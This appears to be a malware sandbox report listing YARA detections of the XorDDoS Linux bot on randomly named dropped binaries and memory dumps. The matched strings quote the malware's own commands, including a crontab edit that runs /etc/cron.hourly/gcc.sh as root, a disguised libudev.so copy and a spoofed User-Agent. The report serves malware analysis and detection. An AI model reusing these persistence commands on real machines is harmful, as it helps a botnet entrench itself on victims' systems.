/lib/libudev.so	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
/usr/bin/txflbjqefg	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/zyapsjpaje	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/wrfeamwlub	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/kmavqzvhro	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/kmavqzvhro	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/kmavqzvhro	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
/usr/bin/whtzopaggc	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/zyapsjpaje	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/zyapsjpaje	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
/usr/bin/txflbjqefg	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/txflbjqefg	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
/usr/bin/whtzopaggc	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/whtzopaggc	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
/usr/bin/wyyhrifhaz	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/wrfeamwlub	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/wrfeamwlub	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
/usr/bin/wyyhrifhaz	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/wyyhrifhaz	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
/usr/bin/wgpgdetjwe	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/wgpgdetjwe	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/wgpgdetjwe	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
/usr/bin/yfiimchuiz	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/yfiimchuiz	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/yfiimchuiz	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
/usr/bin/qvilroogsz	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/qvilroogsz	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/qvilroogsz	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
Click to see the 33 entries

Memory Dumps

Source	Rule	Description	Author	Strings
10241.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10241.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9656.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9656.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9689.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9689.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10153.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10153.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9999.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9999.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9644.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9644.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9568.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9568.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10032.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10032.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9821.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9821.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10417.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10417.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10307.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10307.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10197.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10197.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9623.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9623.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9678.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9678.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10263.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10263.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10406.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
